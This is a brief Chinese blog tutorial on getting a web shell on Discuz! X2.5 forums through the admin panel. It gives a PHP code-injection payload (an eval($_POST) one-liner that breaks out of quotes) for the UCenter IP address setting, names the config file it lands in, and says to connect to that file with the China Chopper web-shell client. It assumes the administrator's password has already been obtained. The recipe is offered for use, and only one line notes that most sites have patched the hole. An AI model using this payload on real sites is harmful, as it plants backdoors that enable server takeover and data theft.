当前位置: 首页 > PHP, 漏洞列表, 编程语言 > 正文

discuz! x2.5后台拿shell

首先你应该得到管理员的用户名和密码,若密码最好不过了,如果实在找不到找好去找一下老密。密码都得到了以后,进入后台,直接在UCenter IP 地址(站长--ucenter设置):

里面插入一句话  xxoo\\');eval($_POST[a])?>;// 就ok

然后菜刀连接http://www.xxoo.com/config/config_ucenter.php 密码a。

现在这个漏洞应该大部分的网站都不存在了。


本文固定链接: http://www.chnpanda.com/529.html | 熊猫博客 | 转载请注明出处,谢谢合作!

本文关键字: ,

discuz! x2.5后台拿shell:等您坐沙发呢!

发表评论

亲,不支持纯字母、符号评论哦~